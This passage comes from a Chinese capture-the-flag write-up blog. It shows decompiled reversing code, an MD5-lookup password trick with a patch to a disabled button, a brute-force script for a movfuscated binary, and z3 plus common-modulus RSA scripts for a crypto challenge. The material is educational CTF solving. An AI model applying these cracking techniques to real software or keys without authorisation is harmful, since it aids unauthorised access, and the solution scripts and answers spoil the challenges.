class="p">(</span><span class="n">phProv</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">v7</span> <span class="o">=</span> <span class="n">pbData</span><span class="p">;</span> <span class="n">v8</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">unk_4128A0</span><span class="p">;</span> <span class="n">v9</span> <span class="o">=</span> <span class="mi">12</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v7</span> <span class="o">==</span> <span class="o">*</span><span class="n">v8</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v7</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span> <span class="o">++</span><span class="n">v8</span><span class="p">;</span> <span class="n">v10</span> <span class="o">=</span> <span class="n">v9</span> <span class="o">&lt;</span> <span class="mi">4</span><span class="p">;</span> <span class="n">v9</span> <span class="o">-=</span> <span class="mi">4</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v10</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v11</span> <span class="o">=</span> <span class="n">String</span><span class="p">;</span> <span class="n">v12</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">v13</span> <span class="o">=</span> <span class="mi">3</span><span class="p">;</span> <span class="n">v14</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="k">do</span> <span class="p">{</span> <span class="n">Text</span><span class="p">[</span><span class="n">v12</span><span class="p">]</span> <span class="o">=</span> <span class="n">v11</span> <span class="o">^</span> <span class="n">data</span><span class="p">[</span><span class="n">v12</span><span class="p">]</span> <span class="o">^</span> <span class="n">pbData</span><span class="p">[</span><span class="n">v12</span> <span class="o">&amp;</span> <span class="mh">0xF</span><span class="p">];</span> <span class="n">Text</span><span class="p">[</span><span class="n">v12</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">v11</span> <span class="o">^</span> <span class="n">data</span><span class="p">[</span><span class="n">v12</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">^</span> <span class="n">pbData</span><span class="p">[((</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v14</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xF</span><span class="p">];</span> <span class="n">v15</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">v14</span><span class="p">]</span> <span class="o">^</span> <span class="n">pbData</span><span class="p">[</span><span class="n">v14</span> <span class="o">&amp;</span> <span class="mh">0xF</span><span class="p">];</span> <span class="n">v14</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span> <span class="n">Text</span><span class="p">[</span><span class="n">v13</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">v11</span> <span class="o">^</span> <span class="n">v15</span><span class="p">;</span> <span class="n">v16</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">v13</span><span class="p">]</span> <span class="o">^</span> <span class="n">pbData</span><span class="p">[</span><span class="n">v13</span> <span class="o">&amp;</span> <span class="mh">0xF</span><span class="p">];</span> <span class="n">v13</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span> <span class="n">Text</span><span class="p">[</span><span class="n">v12</span> <span class="o">+</span> <span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">v11</span> <span class="o">^</span> <span class="n">v16</span><span class="p">;</span> <span class="n">v12</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span> <span class="p">}</span> <span class="k">while</span> <span class="p">(</span> <span class="n">v14</span> <span class="o">&lt;</span> <span class="mh">0x22</span> <span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v12</span> <span class="o">&lt;</span> <span class="mh">0x80</span> <span class="p">)</span> <span class="p">{</span> <span class="n">Text</span><span class="p">[</span><span class="n">v12</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">MessageBoxA</span><span class="p">(</span><span class="n">hWnd</span><span class="p">,</span> <span class="n">Text</span><span class="p">,</span> <span class="n">aFlagIs</span><span class="p">,</span> <span class="mh">0x40u</span><span class="p">);</span> <span class="n">ExitProcess</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="n">__report_rangecheckfailure</span><span class="p">();</span> <span class="n">__debugbreak</span><span class="p">();</span> <span class="n">JUMPOUT</span><span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">algn_40BDCF</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="n">MessageBoxA</span><span class="p">(</span><span class="n">hWnd</span><span class="p">,</span> <span class="n">aWrongAnswer</span><span class="p">,</span> <span class="n">aHackmectf_2</span><span class="p">,</span> <span class="mh">0x10u</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>可以看出,只需满足 <code>v8 = &amp;unk_4128A0;</code> 一句即可,后边的逻辑完全不用管,经过查API的文档,可以知道只需 <code>MD5(input) == &amp;unk_4128A0</code> 即可, 而这个 hash 又能查出来</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">该数据已破解成功! 密文: 34AF0D074B17F44D1BB939765B02776F 明文: how[space]do[space]you[space]turn[space]this[space]on 数据来源: admin 用时:00:00:00.1911904 </code></pre></td></tr></table> </div> </div><p>根据程序逻辑,在输入框中输入 <code>how do you turn this on</code> 就会弹出 flag, 但输入 flag 后又发现 check Password 按钮是灰色的不能点, 这个好办, 根据查阅 API 发现 EnableWIndow 函数做了限制, 当 EnableWindow 函数的第二个参数是 0 时, 控件无响应, 将次参数 patch 为 1 即可, 这时输入 <code>how do you turn this on</code> 就能弹 flag 了</p> <blockquote> <p>多说一句, 这道题用 wine 模拟可以减少很多不必要的麻烦, 具体可以看这道题的 <a href="https://www.cnblogs.com/WangAoBo/p/iscc2018_leftleftrightright-writeup.html">writeup</a></p> </blockquote> <h3 id="0x0b-mov">0x0B mov</h3> <p>这个题前前后后做了好几个月，后来发现是我想麻烦了，先说一下我做这道题的历程</p> <ol> <li> <p>IDA打开之后看到一堆mov，根据提示*<code>MOV</code> instruction is turing complete!*很容易google到这是<a href="https://github.com/xoreaxeaxeax/movfuscator">movfuscator混淆</a>，同时找到了去混淆的工具<a href="https://github.com/kirschju/demovfuscator">demovfuscator</a>，安装后（不是太好装）发现去混淆的效果并不理想，生成的CG也似乎有问题</p> </li> <li> <p>又google到类似题目的writeup，有使用<a href="http://blog.csdn.net/charlie_heng/article/details/79206863">qira</a>，有使用<a href="https://r00tus3r.wordpress.com/2017/02/07/alex-ctf-2017/">perf</a>，有使用<a href="https://github.com/TeamContagion/CTF-Write-Ups/tree/master/AlexCTF-2017/Reversing/RE5%20-%20Packed%20Movement%20%28350%29">pin</a>，有直接从<a href="http://www.leommxj.com/2017/02/08/AlexCTF-Writeup/">内存</a>中抠出来的，因为最近在看fuzz的一些东西，所以想尝试使用pin解题目</p> </li> <li> <p>大致了解了pin的工作原理后，安装好环境，开始找输入对输出的影响，这时偶然发现一个bug，输入n位字符时，这n位与flag的前n位相等即可，可利用这个特性爆破</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fphzg1swirj309j07e3zu.jpg" alt=""></p> <p>爆破脚本</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">inndy_mov</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="n">Popen</span><span class="p">,</span> <span class="n">PIPE</span> <span class="kn">from</span> <span class="nn">string</span> <span class="kn">import</span> <span class="n">printable</span> <span class="n">ans</span> <span class="o">=</span> <span class="s2">&#34;FLAG{&#34;</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="k">if</span> <span class="s2">&#34;}&#34;</span> <span class="ow">in</span> <span class="n">ans</span><span class="p">:</span> <span class="k">print</span> <span class="n">ans</span> <span class="k">break</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">printable</span><span class="p">:</span> <span class="n">f</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="s2">&#34;./mov&#34;</span><span class="p">,</span> <span class="n">shell</span> <span class="o">=</span> <span class="bp">True</span><span class="p">,</span> <span class="n">stdin</span> <span class="o">=</span> <span class="n">PIPE</span><span class="p">,</span> <span class="n">stdout</span> <span class="o">=</span> <span class="n">PIPE</span><span class="p">)</span> <span class="n">tmp</span> <span class="o">=</span> <span class="n">ans</span> <span class="o">+</span> <span class="n">c</span> <span class="n">f</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">tmp</span> <span class="o">+</span> <span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">stdout</span><span class="p">,</span> <span class="n">stderr</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">communicate</span><span class="p">()</span> <span class="k">if</span> <span class="s2">&#34;Good&#34;</span> <span class="ow">in</span> <span class="n">stdout</span><span class="p">:</span> <span class="n">ans</span> <span class="o">=</span> <span class="n">tmp</span> <span class="k">print</span> <span class="n">ans</span> <span class="k">break</span> </code></pre></td></tr></table> </div> </div><p>实际效果也很好，不到2s就爆破出了flag</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fphzjhm2enj30je0j1gs5.jpg" alt=""></p> </li> </ol> <p>觉得使用pin的方法很巧妙，以后再补上使用pin的wp</p> <h2 id="crypto">Crypto</h2> <h3 id="0x00-xor">0x00 xor</h3> <p>zwhubuntu师傅告诉我这题可以用xortool解，项目地址https://github.com/hellman/xortool</p> <p>主要记录一下使用方法</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkr5bufy5mj30hy0fl125.jpg" alt=""></p> <h3 id="0x01-ffa">0x01 ffa</h3> <p>这个题就只想说z3大法好了。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python3</span> <span class="kn">import</span> <span class="nn">sympy</span> <span class="kn">import</span> <span class="nn">json</span> <span class="n">m</span> <span class="o">=</span> <span class="n">sympy</span><span class="o">.</span><span class="n">randprime</span><span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">257</span><span class="p">,</span> <span class="mi">2</span><span class="o">**</span><span class="mi">258</span><span class="p">)</span> <span class="n">M</span> <span class="o">=</span> <span class="n">sympy</span><span class="o">.</span><span class="n">randprime</span><span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">257</span><span class="p">,</span> <span class="mi">2</span><span class="o">**</span><span class="mi">258</span><span class="p">)</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span> <span class="o">=</span> <span class="p">[(</span><span class="n">sympy</span><span class="o">.</span><span class="n">randprime</span><span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">256</span><span class="p">,</span> <span class="mi">2</span><span class="o">**</span><span class="mi">257</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">)]</span> <span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">+</span> <span class="n">b</span> <span class="o">*</span> <span class="mi">3</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span> <span class="n">y</span> <span class="o">=</span> <span class="p">(</span><span class="n">b</span> <span class="o">-</span> <span class="n">c</span> <span class="o">*</span> <span class="mi">5</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span> <span class="n">z</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span> <span class="o">+</span> <span class="n">c</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span> <span class="n">flag</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="s1">&#39;flag&#39;</span><span class="p">,</span> <span class="s1">&#39;rb&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span><span class="o">.</span><span class="n">hex</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span> <span class="n">p</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">flag</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">M</span><span class="p">)</span> <span class="n">q</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">flag</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">M</span><span class="p">)</span> <span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">({</span> <span class="n">key</span><span class="p">:</span> <span class="nb">globals</span><span class="p">()[</span><span class="n">key</span><span class="p">]</span> <span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="s2">&#34;Mmxyzpq&#34;</span> <span class="p">},</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;crypted&#39;</span><span class="p">,</span> <span class="s1">&#39;w&#39;</span><span class="p">))</span> <span class="c1"># {&#34;p&#34;: 240670121804208978394996710730839069728700956824706945984819015371493837551238, &#34;q&#34;: 63385828825643452682833619835670889340533854879683013984056508942989973395315, &#34;M&#34;: 349579051431173103963525574908108980776346966102045838681986112083541754544269, &#34;z&#34;: 213932962252915797768584248464896200082707350140827098890648372492180142394587, &#34;m&#34;: 282832747915637398142431587525135167098126503327259369230840635687863475396299, &#34;x&#34;: 254732859357467931957861825273244795556693016657393159194417526480484204095858, &#34;y&#34;: 261877836792399836452074575192123520294695871579540257591169122727176542734080}</span> </code></pre></td></tr></table> </div> </div><p>程序的逻辑很简单，生成了几个大随机数<strong>M, m, x, y, z, p, q</strong>，通过分析代码不难得出如果得到a或者b就能得到flag，但问题就在于，怎么求出a或者b。</p> <p>刚开始的想法是通过有限域的方法化简，得到a或者b，但正要动手时转念一想，题上的约束关系都很明确，可以用z3试一下，于是写了z3求解的代码：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">getabc</span><span class="p">():</span> <span class="n">a</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s2">&#34;a&#34;</span><span class="p">,</span> <span class="mi">265</span><span class="p">)</span> <span class="n">b</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s2">&#34;b&#34;</span><span class="p">,</span> <span class="mi">265</span><span class="p">)</span> <span class="n">c</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s2">&#34;c&#34;</span><span class="p">,</span> <span class="mi">265</span><span class="p">)</span> <span class="n">x</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;x&#34;</span><span class="p">]</span> <span class="n">y</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;y&#34;</span><span class="p">]</span> <span class="n">z</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;z&#34;</span><span class="p">]</span> <span class="n">m</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;m&#34;</span><span class="p">]</span> <span class="c1"># print x, y, z</span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">UGT</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULT</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">257</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">UGT</span><span class="p">(</span><span class="n">b</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULT</span><span class="p">(</span><span class="n">b</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">257</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">UGT</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULT</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">257</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">x</span> <span class="o">==</span> <span class="p">(</span><span class="n">a</span> <span class="o">+</span> <span class="n">b</span> <span class="o">*</span> <span class="mi">3</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">y</span> <span class="o">==</span> <span class="p">(</span><span class="n">b</span> <span class="o">-</span> <span class="n">c</span> <span class="o">*</span> <span class="mi">5</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">z</span> <span class="o">==</span> <span class="p">(</span><span class="n">a</span> <span class="o">+</span> <span class="n">c</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="o">%</span> <span class="n">m</span><span class="p">)</span> <span class="k">while</span> <span class="n">s</span><span class="o">.</span><span class="n">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span> <span class="k">if</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">())</span> <span class="ow">and</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">b</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">())</span> <span class="ow">and</span> <span class="n">isPrime</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">c</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">()):</span> <span class="k">print</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()</span> <span class="n">A</span><span class="p">,</span> <span class="n">B</span><span class="p">,</span> <span class="n">C</span> <span class="o">=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">(),</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">b</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">(),</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">c</span><span class="p">]</span><span class="o">.</span><span class="n">as_long</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">Or</span><span class="p">(</span><span class="n">a</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">a</span><span class="p">],</span> <span class="n">b</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">b</span><span class="p">],</span> <span class="n">c</span> <span class="o">!=</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()[</span><span class="n">c</span><span class="p">]))</span> <span class="k">else</span><span class="p">:</span> <span class="k">print</span> <span class="s2">&#34;Finished&#34;</span> <span class="k">return</span> <span class="n">A</span><span class="p">,</span> <span class="n">B</span><span class="p">,</span> <span class="n">C</span> </code></pre></td></tr></table> </div> </div><blockquote> <p>有两点需要注意：</p> <ol> <li>用BitVec声明变量时，首先要估算中间变量的范围，确保运算过程中数据不会溢出(如该题中使用了较大的265位)，但为了运行速度也不能过大</li> <li>大整数的比较大小建议使用UGT/ULT代替&gt;/&lt;</li> </ol> </blockquote> <p>本来运行的时候还替z3担心了一下会不会因为数据太大直接崩掉，但没想到用了短短的8s就跑出了结果</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fntrjndsyyj30k507gdjy.jpg" alt=""></p> <p>计算出a，b，c后，主要问题就解决了。</p> <p>意识到使用flag的加密实际上是RSA时，利用a和b进行了共模攻击，很快就出flag了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">libnum</span> <span class="kn">import</span> <span class="n">prime_test</span> <span class="k">as</span> <span class="n">isPrime</span> <span class="kn">from</span> <span class="nn">libnum</span> <span class="kn">import</span> <span class="n">n2s</span><span class="p">,</span> <span class="n">xgcd</span><span class="p">,</span> <span class="n">invmod</span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">d</span> <span class="o">=</span> <span class="p">{</span><span class="s2">&#34;p&#34;</span><span class="p">:</span> <span class="mi">240670121804208978394996710730839069728700956824706945984819015371493837551238</span><span class="p">,</span> <span class="s2">&#34;q&#34;</span><span class="p">:</span> <span class="mi">63385828825643452682833619835670889340533854879683013984056508942989973395315</span><span class="p">,</span> <span class="s2">&#34;M&#34;</span><span class="p">:</span> <span class="mi">349579051431173103963525574908108980776346966102045838681986112083541754544269</span><span class="p">,</span> <span class="s2">&#34;z&#34;</span><span class="p">:</span> <span class="mi">213932962252915797768584248464896200082707350140827098890648372492180142394587</span><span class="p">,</span> <span class="s2">&#34;m&#34;</span><span class="p">:</span> <span class="mi">282832747915637398142431587525135167098126503327259369230840635687863475396299</span><span class="p">,</span> <span class="s2">&#34;x&#34;</span><span class="p">:</span> <span class="mi">254732859357467931957861825273244795556693016657393159194417526480484204095858</span><span class="p">,</span> <span class="s2">&#34;y&#34;</span><span class="p">:</span> <span class="mi">261877836792399836452074575192123520294695871579540257591169122727176542734080</span><span class="p">}</span> <span class="k">def</span> <span class="nf">getabc</span><span class="p">():</span> <span class="n">a</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s2">&#34;a&#34;</span><span class="p">,</span> <span class="mi">265</span><span class="p">)</span> <span class="n">b</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s2">&#34;b&#34;</span><span class="p">,</span> <span class="mi">265</span><span class="p">)</span> <span class="n">c</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s2">&#34;c&#34;</span><span class="p">,</span> <span class="mi">265</span><span class="p">)</span> <span class="n">x</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;x&#34;</span><span class="p">]</span> <span class="n">y</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;y&#34;</span><span class="p">]</span> <span class="n">z</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;z&#34;</span><span class="p">]</span> <span class="n">m</span> <span class="o">=</span> <span class="n">d</span><span class="p">[</span><span class="s2">&#34;m&#34;</span><span class="p">]</span> <span class="c1"># print x, y, z</span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">UGT</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULT</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">257</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">UGT</span><span class="p">(</span><span class="n">b</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULT</span><span class="p">(</span><span class="n">b</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">257</span><span class="p">,</span> <span class="n">m</span><span class="p">)))</span> <span class="n">s</span><span 